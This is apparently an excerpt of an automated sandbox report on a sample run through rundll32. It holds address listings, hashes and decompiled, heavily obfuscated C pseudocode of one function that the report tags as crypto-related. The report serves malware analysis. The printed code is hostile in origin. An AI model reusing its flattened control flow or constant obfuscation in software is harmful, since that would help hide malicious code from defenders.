                                                                      0x01ff835b
                                                                      0x01ff8366
                                                                      0x01ff836e
                                                                      0x01ff8379
                                                                      0x01ff8384
                                                                      0x01ff838f
                                                                      0x01ff8397
                                                                      0x01ff839f
                                                                      0x01ff83aa
                                                                      0x01ff83b2
                                                                      0x01ff83ba
                                                                      0x01ff83c2
                                                                      0x01ff83c7
                                                                      0x01ff83cf
                                                                      0x01ff83da
                                                                      0x01ff83e5
                                                                      0x01ff83f0
                                                                      0x01ff83fb
                                                                      0x01ff8403
                                                                      0x01ff8411
                                                                      0x01ff8415
                                                                      0x01ff841d
                                                                      0x01ff8425
                                                                      0x01ff8430
                                                                      0x01ff8438
                                                                      0x01ff8443
                                                                      0x01ff844e
                                                                      0x01ff8456
                                                                      0x01ff845e
                                                                      0x01ff8466
                                                                      0x01ff846b
                                                                      0x01ff8473
                                                                      0x01ff8489
                                                                      0x01ff848e
                                                                      0x01ff8497
                                                                      0x01ff84a2
                                                                      0x01ff84ad
                                                                      0x01ff84b8
                                                                      0x01ff84c3
                                                                      0x01ff84ce
                                                                      0x01ff84d9
                                                                      0x01ff84e4
                                                                      0x01ff84ec
                                                                      0x01ff84f7
                                                                      0x01ff8502
                                                                      0x01ff850d
                                                                      0x01ff8515
                                                                      0x01ff8520
                                                                      0x01ff8533
                                                                      0x01ff8536
                                                                      0x01ff853d
                                                                      0x01ff8548
                                                                      0x01ff8553
                                                                      0x01ff8566
                                                                      0x01ff856d
                                                                      0x01ff8578
                                                                      0x01ff8580
                                                                      0x01ff8588
                                                                      0x01ff8590
                                                                      0x01ff8598
                                                                      0x01ff85a0
                                                                      0x01ff85b6
                                                                      0x01ff85bd
                                                                      0x01ff85c8
                                                                      0x01ff85d0
                                                                      0x01ff85d8
                                                                      0x01ff85dd
                                                                      0x01ff85e2
                                                                      0x01ff85ea
                                                                      0x01ff85f5
                                                                      0x01ff8600
                                                                      0x01ff8608
                                                                      0x01ff8613
                                                                      0x01ff861e
                                                                      0x01ff8630
                                                                      0x01ff8635
                                                                      0x01ff863e
                                                                      0x01ff8649
                                                                      0x01ff8654
                                                                      0x01ff865c
                                                                      0x01ff8667
                                                                      0x01ff866f
                                                                      0x01ff8677
                                                                      0x01ff8681
                                                                      0x01ff8682
                                                                      0x01ff8686
                                                                      0x01ff868e
                                                                      0x01ff86a2
                                                                      0x01ff86a9
                                                                      0x01ff86b4
                                                                      0x01ff86bf
                                                                      0x01ff86ca
                                                                      0x01ff86d5
                                                                      0x01ff86e0
                                                                      0x01ff86ed
                                                                      0x01ff86fc
                                                                      0x01ff86ff
                                                                      0x01ff8703
                                                                      0x01ff8710
                                                                      0x01ff8714
                                                                      0x01ff871c
                                                                      0x01ff8727
                                                                      0x01ff873d
                                                                      0x01ff8744
                                                                      0x01ff874f
                                                                      0x01ff875b
                                                                      0x01ff8760
                                                                      0x01ff8766
                                                                      0x01ff8770
                                                                      0x01ff8773
                                                                      0x01ff8777
                                                                      0x01ff877f
                                                                      0x01ff8787
                                                                      0x01ff878f
                                                                      0x01ff879f
                                                                      0x01ff87a3
                                                                      0x01ff87ab
                                                                      0x01ff87b6
                                                                      0x01ff87be
                                                                      0x01ff87c9
                                                                      0x01ff87d4
                                                                      0x01ff87df
                                                                      0x01ff87ea
                                                                      0x01ff87f6
                                                                      0x01ff87fb
                                                                      0x01ff8801
                                                                      0x01ff8809
                                                                      0x01ff8811
                                                                      0x01ff8819
                                                                      0x01ff8821
                                                                      0x01ff8829
                                                                      0x01ff882e
                                                                      0x01ff8836
                                                                      0x01ff883e
                                                                      0x01ff8846
                                                                      0x01ff884b
                                                                      0x01ff8850
                                                                      0x01ff8858
                                                                      0x01ff8863
                                                                      0x01ff886b
                                                                      0x01ff8876
                                                                      0x01ff887e
                                                                      0x01ff8886
                                                                      0x01ff888e
                                                                      0x01ff8896
                                                                      0x01ff889e
                                                                      0x01ff88a6
                                                                      0x01ff88af
                                                                      0x01ff88b2
                                                                      0x01ff88b6
                                                                      0x01ff88be
                                                                      0x01ff88c6
                                                                      0x01ff88ce
                                                                      0x01ff88db
                                                                      0x01ff88df
                                                                      0x01ff88e7
                                                                      0x01ff88f2
                                                                      0x01ff88fd
                                                                      0x01ff8908
                                                                      0x01ff8910
                                                                      0x01ff8915
                                                                      0x01ff8922
                                                                      0x01ff8926
                                                                      0x01ff892e
                                                                      0x01ff8936
                                                                      0x01ff893e
                                                                      0x01ff8946
                                                                      0x01ff894e
                                                                      0x01ff8961
                                                                      0x01ff8968
                                                                      0x01ff8973
                                                                      0x01ff897e
                                                                      0x01ff8989
                                                                      0x01ff8994
                                                                      0x01ff899f
                                                                      0x01ff89aa
                                                                      0x01ff89b5
                                                                      0x01ff89c0
                                                                      0x01ff89cb
                                                                      0x01ff89d6
                                                                      0x01ff89e1
                                                                      0x01ff89ec
                                                                      0x01ff89f4
                                                                      0x01ff89ff
                                                                      0x01ff8a07
                                                                      0x01ff8a0b
                                                                      0x01ff8a10
                                                                      0x01ff8a14
                                                                      0x01ff8a1c
                                                                      0x01ff8a2f
                                                                      0x01ff8a36
                                                                      0x01ff8a41
                                                                      0x01ff8a4c
                                                                      0x01ff8a57
                                                                      0x01ff8a62
                                                                      0x01ff8a6d
                                                                      0x01ff8a7f
                                                                      0x01ff8a86
                                                                      0x01ff8a8a
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8a95
                                                                      0x01ff8a95
                                                                      0x01ff8a95
                                                                      0x01ff8a9b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff8aa1
                                                                      0x01ff8aa1
                                                                      0x01ff8d2c
                                                                      0x01ff8d37
                                                                      0x01ff8d3c
                                                                      0x01ff8d3c
                                                                      0x01ff8d3d
                                                                      0x01ff8d41
                                                                      0x01ff8d42
                                                                      0x01ff8d62
                                                                      0x01ff8d74
                                                                      0x01ff8d79
                                                                      0x01ff8d7c
                                                                      0x01ff8d81
                                                                      0x01ff8d82
                                                                      0x01ff8d85
                                                                      0x01ff8d88
                                                                      0x01ff8d88
                                                                      0x01ff8d88
                                                                      0x01ff8d8b
                                                                      0x01ff8d92
                                                                      0x01ff8d92
                                                                      0x01ff8d99
                                                                      0x01ff8da2
                                                                      0x01ff8da5
                                                                      0x01ff8daa
                                                                      0x01ff8dae
                                                                      0x00000000
                                                                      0x01ff8aa7
                                                                      0x01ff8aac
                                                                      0x01ff8aae
                                                                      0x01ff8c8c
                                                                      0x01ff8c92
                                                                      0x01ff8cf6
                                                                      0x01ff8cf7
                                                                      0x01ff8d03
                                                                      0x01ff8d04
                                                                      0x01ff8d09
                                                                      0x01ff8d0c
                                                                      0x01ff8d11
                                                                      0x01ff8d15
                                                                      0x01ff8d16
                                                                      0x01ff8d19
                                                                      0x00000000
                                                                      0x01ff8c94
                                                                      0x01ff8c94
                                                                      0x01ff8c9a
                                                                      0x01ff8cdf
                                                                      0x01ff8ce5
                                                                      0x00000000
                                                                      0x01ff8c9c
                                                                      0x01ff8c9c
                                                                      0x01ff8ca2
                                                                      0x00000000
                                                                      0x01ff8ca8
                                                                      0x01ff8cba
                                                                      0x01ff8cc0
                                                                      0x00000000
                                                                      0x01ff8cc0
                                                                      0x01ff8ca2
                                                                      0x01ff8c9a
                                                                      0x01ff8ab4
                                                                      0x01ff8ab4
                                                                      0x01ff8bcc
                                                                      0x01ff8bd1
                                                                      0x01ff8bd8
                                                                      0x01ff8be7
                                                                      0x01ff8bf2
                                                                      0x01ff8bf7
                                                                      0x01ff8bfe
                                                                      0x01ff8c03
                                                                      0x01ff8c04
                                                                      0x01ff8c08
                                                                      0x01ff8c09
                                                                      0x01ff8c17
                                                                      0x01ff8c27
                                                                      0x01ff8c28
                                                                      0x01ff8c2f
                                                                      0x01ff8c33
                                                                      0x01ff8c3a
                                                                      0x01ff8c41
                                                                      0x01ff8c4a
                                                                      0x01ff8c4b
                                                                      0x01ff8c66
                                                                      0x01ff8c70
                                                                      0x01ff8c73
                                                                      0x01ff8c7b
                                                                      0x01ff8c7f
                                                                      0x01ff8c83
                                                                      0x00000000
                                                                      0x01ff8aba
                                                                      0x01ff8ac0
                                                                      0x01ff8bb4
                                                                      0x01ff8bbb
                                                                      0x01ff8bbc
                                                                      0x01ff8bc4
                                                                      0x00000000
                                                                      0x01ff8ac6
                                                                      0x01ff8acc
                                                                      0x01ff901e
                                                                      0x01ff9025
                                                                      0x00000000
                                                                      0x01ff8ad2
                                                                      0x01ff8ad8
                                                                      0x01ff8b8a
                                                                      0x01ff8b90
                                                                      0x01ff8b95
                                                                      0x01ff8b95
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x00000000
                                                                      0x01ff8a91
                                                                      0x01ff8ade
                                                                      0x01ff8ae4
                                                                      0x01ff9007
                                                                      0x01ff9007
                                                                      0x01ff900d
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x00000000
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8aea
                                                                      0x01ff8b00
                                                                      0x01ff8b01
                                                                      0x01ff8b0a
                                                                      0x01ff8b0c
                                                                      0x01ff8b21
                                                                      0x01ff8b23
                                                                      0x01ff8b2b
                                                                      0x01ff8b2d
                                                                      0x01ff8b4f
                                                                      0x01ff8b54
                                                                      0x01ff8b57
                                                                      0x01ff8b5d
                                                                      0x01ff9014
                                                                      0x01ff9018
                                                                      0x01ff9029
                                                                      0x01ff902b
                                                                      0x01ff8b63
                                                                      0x01ff8b63
                                                                      0x01ff8b68
                                                                      0x01ff8b68
                                                                      0x01ff8b6c
                                                                      0x01ff8b6c
                                                                      0x01ff8a95
                                                                      0x01ff8a95
                                                                      0x01ff8a9b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff8a9b
                                                                      0x01ff8b5d
                                                                      0x01ff8b2d
                                                                      0x01ff8ae4
                                                                      0x01ff8ad8
                                                                      0x01ff8acc
                                                                      0x01ff8ac0
                                                                      0x01ff8ab4
                                                                      0x01ff8aae
                                                                      0x01ff9033
                                                                      0x01ff903d
                                                                      0x01ff8dba
                                                                      0x01ff8dba
                                                                      0x01ff8dc0
                                                                      0x01ff8ff8
                                                                      0x01ff9002
                                                                      0x00000000
                                                                      0x01ff8dc6
                                                                      0x01ff8dc6
                                                                      0x01ff8dcc
                                                                      0x01ff8fd4
                                                                      0x01ff8fd9
                                                                      0x00000000
                                                                      0x01ff8dd2
                                                                      0x01ff8dd2
                                                                      0x01ff8dd8
                                                                      0x01ff8fbc
                                                                      0x01ff8fc3
                                                                      0x00000000
                                                                      0x01ff8dde
                                                                      0x01ff8dde
                                                                      0x01ff8de4
                                                                      0x01ff8f94
                                                                      0x01ff8f9c
                                                                      0x01ff8f9d
                                                                      0x01ff8fa5
                                                                      0x00000000
                                                                      0x01ff8dea
                                                                      0x01ff8dea
                                                                      0x01ff8df0
                                                                      0x01ff8ee8
                                                                      0x01ff8eed
                                                                      0x01ff8ef4
                                                                      0x01ff8f06
                                                                      0x01ff8f0b
                                                                      0x01ff8f4c
                                                                      0x01ff8f61
                                                                      0x01ff8f66
                                                                      0x01ff8f6a
                                                                      0x01ff8f6d
                                                                      0x00000000
                                                                      0x01ff8df6
                                                                      0x01ff8df6
                                                                      0x01ff8dfc
                                                                      0x01ff8e9f
                                                                      0x01ff8eb5
                                                                      0x01ff8ebc
                                                                      0x01ff8ec4
                                                                      0x01ff8ecb
                                                                      0x01ff8ed0
                                                                      0x01ff8ed5
                                                                      0x01ff8edd
                                                                      0x00000000
                                                                      0x01ff8e02
                                                                      0x01ff8e02
                                                                      0x01ff8e08
                                                                      0x00000000
                                                                      0x01ff8e0e
                                                                      0x01ff8e1c
                                                                      0x01ff8e24
                                                                      0x01ff8e57
                                                                      0x01ff8e6d
                                                                      0x01ff8e72
                                                                      0x01ff8e77
                                                                      0x01ff8e7f
                                                                      0x00000000
                                                                      0x01ff8e7f
                                                                      0x01ff8e08
                                                                      0x01ff8dfc
                                                                      0x01ff8df0
                                                                      0x01ff8de4
                                                                      0x01ff8dd8
                                                                      0x01ff8dcc
                                                                      0x00000000
                                                                      0x01ff8dc0
                                                                      0x01ff8a95

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #$$Uf.$7$<$BT$D2$\L$\|$fY$h.$hW$jg$l}$mb$ti$vj$x+-$x`${$$F$P$T$W$n
                                                                      • API String ID: 0-3542471488
                                                                      • Opcode ID: ca5851d928ab7d871b40e7a895bd611007882e3c4dc7b0fb4f71945d2e41ba98
                                                                      • Instruction ID: a36553f013968eca36fee90c175f19d8384ed6a27b7d064cdc547df7280d608b
                                                                      • Opcode Fuzzy Hash: ca5851d928ab7d871b40e7a895bd611007882e3c4dc7b0fb4f71945d2e41ba98
                                                                      • Instruction Fuzzy Hash: 84820271509385CBE378CF25C889B9FBBE1BF84344F108A1DE2C9862A0D7B59945CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF1806, Relevance: 27.9, Strings: 22, Instructions: 446COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E01FF1806() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				unsigned int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t499;
				intOrPtr _t511;
				intOrPtr* _t513;
				void* _t516;
				void* _t554;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				intOrPtr* _t578;
				intOrPtr* _t579;
				signed int* _t583;
				void* _t586;

				_t583 =  &_v1756;
				_v1600 = 0xf170;
				_v1600 = _v1600 + 0xda8c;
				_t516 = 0x23fcadf5;
				_v1600 = _v1600 ^ 0x0001cbd5;
				_v1728 = 0xe67a;
				_t563 = 0x31;
				_v1728 = _v1728 / _t563;
				_v1728 = _v1728 | 0x44845457;
				_t579 = 0;
				_v1728 = _v1728 + 0xffff77e0;
				_v1728 = _v1728 ^ 0x4483eb2a;
				_v1612 = 0x5383;
				_t564 = 0x6e;
				_v1612 = _v1612 / _t564;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x00005321;
				_v1644 = 0x68ec;
				_v1644 = _v1644 >> 0xe;
				_v1644 = _v1644 + 0xb62b;
				_v1644 = _v1644 ^ 0x0000c171;
				_v1568 = 0x7a35;
				_t565 = 0x22;
				_v1568 = _v1568 / _t565;
				_v1568 = _v1568 ^ 0x0000594d;
				_v1580 = 0xc1bd;
				_v1580 = _v1580 ^ 0x3e17a97f;
				_v1580 = _v1580 ^ 0x3e17610b;
				_v1632 = 0xfbf3;
				_v1632 = _v1632 | 0xe3b32269;
				_t566 = 0x7b;
				_v1576 = 0;
				_v1632 = _v1632 / _t566;
				_v1632 = _v1632 ^ 0x01d9a38a;
				_v1684 = 0x7f0a;
				_v1684 = _v1684 + 0xffffba22;
				_v1684 = _v1684 + 0xffff4029;
				_v1684 = _v1684 ^ 0xffff116a;
				_v1640 = 0xf5e9;
				_v1640 = _v1640 << 4;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 ^ 0x0529e0ca;
				_v1596 = 0xa3c2;
				_v1596 = _v1596 >> 0xd;
				_v1596 = _v1596 ^ 0x00002478;
				_v1744 = 0x3ce7;
				_v1744 = _v1744 + 0x1ec4;
				_v1744 = _v1744 * 0x61;
				_v1744 = _v1744 + 0xffff2004;
				_v1744 = _v1744 ^ 0x0021cb7d;
				_v1720 = 0xc06f;
				_v1720 = _v1720 + 0x6113;
				_v1720 = _v1720 ^ 0x8c8fec38;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0x64761ae1;
				_v1668 = 0xe25c;
				_v1668 = _v1668 + 0xf44b;
				_v1668 = _v1668 ^ 0x0001ff79;
				_v1572 = 0x6c73;
				_v1572 = _v1572 >> 3;
				_v1572 = _v1572 ^ 0x0000406f;
				_v1624 = 0xe234;
				_v1624 = _v1624 << 9;
				_v1624 = _v1624 + 0xf304;
				_v1624 = _v1624 ^ 0x01c53e34;
				_v1752 = 0xc25c;
				_v1752 = _v1752 | 0xfe5ffd9f;
				_t567 = 0x7f;
				_v1752 = _v1752 * 0x29;
				_v1752 = _v1752 ^ 0xbd5fcd1e;
				_v1676 = 0xdc66;
				_v1676 = _v1676 + 0x58ec;
				_v1676 = _v1676 ^ 0x9e034c07;
				_v1676 = _v1676 ^ 0x9e020e3e;
				_v1660 = 0x40b;
				_v1660 = _v1660 << 0x10;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x00083651;
				_v1588 = 0x6188;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x0030a7cc;
				_v1616 = 0x5d0d;
				_v1616 = _v1616 ^ 0x7298dccb;
				_v1616 = _v1616 | 0xce495452;
				_v1616 = _v1616 ^ 0xfed98e9f;
				_v1700 = 0x2fb8;
				_v1700 = _v1700 * 0x1d;
				_v1700 = _v1700 ^ 0x8a1dc7d3;
				_v1700 = _v1700 ^ 0x8a18cc28;
				_v1656 = 0xf6db;
				_v1656 = _v1656 + 0xffffc3cc;
				_v1656 = _v1656 / _t567;
				_v1656 = _v1656 ^ 0x00005990;
				_v1716 = 0xb5ba;
				_v1716 = _v1716 + 0xffff7029;
				_v1716 = _v1716 + 0x41fd;
				_v1716 = _v1716 ^ 0x186cdad6;
				_v1716 = _v1716 ^ 0x186c8663;
				_v1724 = 0x558c;
				_v1724 = _v1724 >> 0xa;
				_v1724 = _v1724 + 0x654a;
				_v1724 = _v1724 + 0xaeff;
				_v1724 = _v1724 ^ 0x00012937;
				_v1680 = 0xa928;
				_v1680 = _v1680 >> 8;
				_v1680 = _v1680 << 7;
				_v1680 = _v1680 ^ 0x00005436;
				_v1688 = 0xdfdd;
				_v1688 = _v1688 + 0x7162;
				_v1688 = _v1688 + 0xb335;
				_v1688 = _v1688 ^ 0x00024834;
				_v1696 = 0xfeae;
				_v1696 = _v1696 + 0xffffed12;
				_v1696 = _v1696 | 0xbccbbbad;
				_v1696 = _v1696 ^ 0xbccb9441;
				_v1704 = 0x372d;
				_t568 = 0x2a;
				_v1704 = _v1704 * 0x33;
				_v1704 = _v1704 + 0xffffe1fa;
				_v1704 = _v1704 ^ 0x000ae97e;
				_v1708 = 0xae48;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x6611f6e7;
				_v1708 = _v1708 ^ 0x660414fc;
				_v1620 = 0x59a4;
				_v1620 = _v1620 * 0x66;
				_v1620 = _v1620 / _t568;
				_v1620 = _v1620 ^ 0x00008226;
				_v1756 = 0x5e70;
				_t569 = 0x32;
				_v1756 = _v1756 / _t569;
				_v1756 = _v1756 + 0xc43e;
				_v1756 = _v1756 * 0x28;
				_v1756 = _v1756 ^ 0x001e8ecc;
				_v1636 = 0x58f6;
				_v1636 = _v1636 ^ 0xb179a89b;
				_v1636 = _v1636 ^ 0x0bd8a84c;
				_v1636 = _v1636 ^ 0xbaa15210;
				_v1604 = 0x6acc;
				_v1604 = _v1604 >> 7;
				_v1604 = _v1604 ^ 0x000023d9;
				_v1692 = 0xda26;
				_v1692 = _v1692 << 0x10;
				_v1692 = _v1692 + 0x271;
				_v1692 = _v1692 ^ 0xda267b29;
				_v1648 = 0x7577;
				_v1648 = _v1648 + 0x56f8;
				_v1648 = _v1648 * 0x3c;
				_v1648 = _v1648 ^ 0x002f8e86;
				_v1628 = 0x645b;
				_v1628 = _v1628 / _t569;
				_v1628 = _v1628 | 0xe392b3cb;
				_v1628 = _v1628 ^ 0xe392e996;
				_v1564 = 0x67c9;
				_v1564 = _v1564 | 0x8303045b;
				_v1564 = _v1564 ^ 0x83034b8c;
				_v1712 = 0x613;
				_t570 = 0x52;
				_v1712 = _v1712 * 0x44;
				_v1712 = _v1712 >> 0xb;
				_v1712 = _v1712 ^ 0x0000010f;
				_v1608 = 0xa33e;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 * 0x27;
				_v1608 = _v1608 ^ 0x000062d8;
				_v1664 = 0x32f9;
				_v1664 = _v1664 + 0xfffff9a5;
				_v1664 = _v1664 * 0x3c;
				_v1664 = _v1664 ^ 0x000a1ece;
				_v1584 = 0xae89;
				_v1584 = _v1584 << 4;
				_v1584 = _v1584 ^ 0x000aaa17;
				_v1672 = 0xd88b;
				_v1672 = _v1672 / _t570;
				_t571 = 0x4b;
				_v1672 = _v1672 / _t571;
				_v1672 = _v1672 ^ 0x00000d29;
				_v1592 = 0x757a;
				_v1592 = _v1592 >> 4;
				_v1592 = _v1592 ^ 0x000029eb;
				_v1652 = 0x303b;
				_t572 = 0x4e;
				_v1652 = _v1652 * 0x72;
				_v1652 = _v1652 / _t572;
				_v1652 = _v1652 ^ 0x000f4642;
				_v1740 = 0x57ea;
				_t573 = 0x1f;
				_v1740 = _v1740 / _t573;
				_t574 = 0xe;
				_v1740 = _v1740 / _t574;
				_v1740 = _v1740 >> 0xe;
				_v1740 = _v1740 ^ 0x00000002;
				_v1736 = 0xe268;
				_v1736 = _v1736 >> 0xd;
				_v1736 = _v1736 | 0xdb2ee2c1;
				_t575 = 0x24;
				_t582 = _v1576;
				_t515 = _v1576;
				_v1736 = _v1736 * 0x31;
				_v1736 = _v1736 ^ 0xf3f96815;
				_v1732 = 0xceb7;
				_v1732 = _v1732 * 0x46;
				_v1732 = _v1732 + 0xffff8676;
				_v1732 = _v1732 + 0xffff6f3a;
				_v1732 = _v1732 ^ 0x00377bba;
				_v1748 = 0x4370;
				_t576 = _v1576;
				_v1748 = _v1748 / _t575;
				_v1748 = _v1748 + 0xffff72bf;
				_v1748 = _v1748 + 0xffff059b;
				_v1748 = _v1748 ^ 0xfffe7a29;
				while(1) {
					L1:
					_t554 = 0x5c;
					do {
						L2:
						_t586 = _t516 - 0x23fcadf5;
						if(_t586 > 0) {
							__eflags = _t516 - 0x2c84300e;
							if(_t516 == 0x2c84300e) {
								_t578 =  *0x2011088 + 0x38;
								while(1) {
									__eflags =  *_t578 - _t554;
									if( *_t578 == _t554) {
										break;
									}
									_t578 = _t578 + 2;
									__eflags = _t578;
								}
								_t576 = _t578 + 2;
								__eflags = _t578 + 2;
								_t516 = 0x1b2a5cce;
								goto L26;
							} else {
								__eflags = _t516 - 0x2cef997e;
								if(_t516 == 0x2cef997e) {
									_t513 = E01FF7626(_v1716, _v1724, _v1680, _t576, _v1688, _v1732, _t516,  &_v520, _v1696, _t516, _v1704, _v1708, _t516, _v1740, _v1620, _t515, _v1748, _t516, _v1756, _v1636, _v1736, _t516, _t576);
									_t582 = _t513;
									_t583 =  &(_t583[0x15]);
									__eflags = _t513;
									if(__eflags == 0) {
										goto L13;
									} else {
										_t516 = 0x1b221acf;
										_t579 = 1;
										_v1576 = 1;
										goto L1;
									}
								} else {
									__eflags = _t516 - 0x357f15e1;
									if(_t516 != 0x357f15e1) {
										goto L26;
									} else {
										E01FF5AB8(_v1664, _v1584, _v1672, _v1592, _t515);
									}
								}
							}
						} else {
							if(_t586 == 0) {
								_push(_t516);
								E01FF471A(_v1600,  &_v1040, _v1728, _v1612, _v1644, _v1568, _v1580);
								_t583 =  &(_t583[8]);
								_t516 = 0x16655107;
								while(1) {
									L1:
									_t554 = 0x5c;
									goto L2;
								}
							} else {
								if(_t516 == 0x30f776d) {
									E01FF5AB8(_v1628, _v1564, _v1712, _v1608, _t582);
									_t583 =  &(_t583[3]);
									L13:
									_t516 = 0x357f15e1;
									while(1) {
										L1:
										_t554 = 0x5c;
										goto L2;
									}
								} else {
									if(_t516 == 0x16655107) {
										_push(0x1ff1308);
										_push(_v1596);
										_push(_v1640);
										_t499 = E01FF5DFC(_v1632, _v1684, __eflags);
										E0200D4E1( &_v1560, __eflags);
										E01FF98C5(0x104, __eflags, _v1744, _v1720, _v1668, _v1572, _v1624,  *0x2011088 + 0x254, _v1752, _v1676,  &_v1560,  *0x2011088 + 0x38, _t499,  &_v1040);
										E02000D6D(_v1660, _v1588, _v1616, _t499);
										_t579 = _v1576;
										_t583 =  &(_t583[0x11]);
										_t516 = 0x2c84300e;
										while(1) {
											L1:
											_t554 = 0x5c;
											goto L2;
										}
									} else {
										if(_t516 == 0x1b221acf) {
											E01FFCAA3(_t582, _t515, _v1692, _v1648);
											_t583 =  &(_t583[3]);
											_t516 = 0x30f776d;
											while(1) {
												L1:
												_t554 = 0x5c;
												goto L2;
											}
										} else {
											if(_t516 != 0x1b2a5cce) {
												goto L26;
											} else {
												_t511 = E0200340E(_v1700, _v1656, _t516, _t516, _v1652);
												_t515 = _t511;
												_t583 =  &(_t583[3]);
												if(_t511 != 0) {
													_t516 = 0x2cef997e;
													while(1) {
														L1:
														_t554 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						L19:
						return _t579;
						L26:
						__eflags = _t516 - 0x7669d04;
					} while (__eflags != 0);
					goto L19;
				}
			}













































































                                                                      0x01ff1806
                                                                      0x01ff180c
                                                                      0x01ff1819
                                                                      0x01ff1824
                                                                      0x01ff1829
                                                                      0x01ff1834
                                                                      0x01ff1846
                                                                      0x01ff184b
                                                                      0x01ff1851
                                                                      0x01ff1859
                                                                      0x01ff185b
                                                                      0x01ff1863
                                                                      0x01ff186b
                                                                      0x01ff187d
                                                                      0x01ff1882
                                                                      0x01ff188b
                                                                      0x01ff1893
                                                                      0x01ff189e
                                                                      0x01ff18a9
                                                                      0x01ff18b1
                                                                      0x01ff18bc
                                                                      0x01ff18c7
                                                                      0x01ff18d9
                                                                      0x01ff18de
                                                                      0x01ff18e7
                                                                      0x01ff18f2
                                                                      0x01ff18fd
                                                                      0x01ff1908
                                                                      0x01ff1913
                                                                      0x01ff191e
                                                                      0x01ff1930
                                                                      0x01ff1933
                                                                      0x01ff193a
                                                                      0x01ff1941
                                                                      0x01ff194c
                                                                      0x01ff1954
                                                                      0x01ff195c
                                                                      0x01ff1964
                                                                      0x01ff196c
                                                                      0x01ff1977
                                                                      0x01ff1987
                                                                      0x01ff198e
                                                                      0x01ff1999
                                                                      0x01ff19a4
                                                                      0x01ff19ac
                                                                      0x01ff19b7
                                                                      0x01ff19bf
                                                                      0x01ff19cc
                                                                      0x01ff19d0
                                                                      0x01ff19d8
                                                                      0x01ff19e0
                                                                      0x01ff19e8
                                                                      0x01ff19f0
                                                                      0x01ff19f8
                                                                      0x01ff19fd
                                                                      0x01ff1a05
                                                                      0x01ff1a15
                                                                      0x01ff1a1d
                                                                      0x01ff1a25
                                                                      0x01ff1a32
                                                                      0x01ff1a3a
                                                                      0x01ff1a45
                                                                      0x01ff1a50
                                                                      0x01ff1a58
                                                                      0x01ff1a63
                                                                      0x01ff1a6e
                                                                      0x01ff1a76
                                                                      0x01ff1a85
                                                                      0x01ff1a88
                                                                      0x01ff1a8c
                                                                      0x01ff1a94
                                                                      0x01ff1a9c
                                                                      0x01ff1aa4
                                                                      0x01ff1aac
                                                                      0x01ff1ab4
                                                                      0x01ff1abc
                                                                      0x01ff1ac1
                                                                      0x01ff1ac6
                                                                      0x01ff1ace
                                                                      0x01ff1ad9
                                                                      0x01ff1ae1
                                                                      0x01ff1aec
                                                                      0x01ff1af7
                                                                      0x01ff1b02
                                                                      0x01ff1b0d
                                                                      0x01ff1b18
                                                                      0x01ff1b25
                                                                      0x01ff1b29
                                                                      0x01ff1b31
                                                                      0x01ff1b39
                                                                      0x01ff1b41
                                                                      0x01ff1b51
                                                                      0x01ff1b55
                                                                      0x01ff1b5d
                                                                      0x01ff1b65
                                                                      0x01ff1b6d
                                                                      0x01ff1b75
                                                                      0x01ff1b7d
                                                                      0x01ff1b85
                                                                      0x01ff1b8d
                                                                      0x01ff1b92
                                                                      0x01ff1b9a
                                                                      0x01ff1ba2
                                                                      0x01ff1baa
                                                                      0x01ff1bb2
                                                                      0x01ff1bb7
                                                                      0x01ff1bbc
                                                                      0x01ff1bc4
                                                                      0x01ff1bcc
                                                                      0x01ff1bd4
                                                                      0x01ff1bdc
                                                                      0x01ff1be4
                                                                      0x01ff1bec
                                                                      0x01ff1bf4
                                                                      0x01ff1bfc
                                                                      0x01ff1c04
                                                                      0x01ff1c11
                                                                      0x01ff1c12
                                                                      0x01ff1c16
                                                                      0x01ff1c1e
                                                                      0x01ff1c26
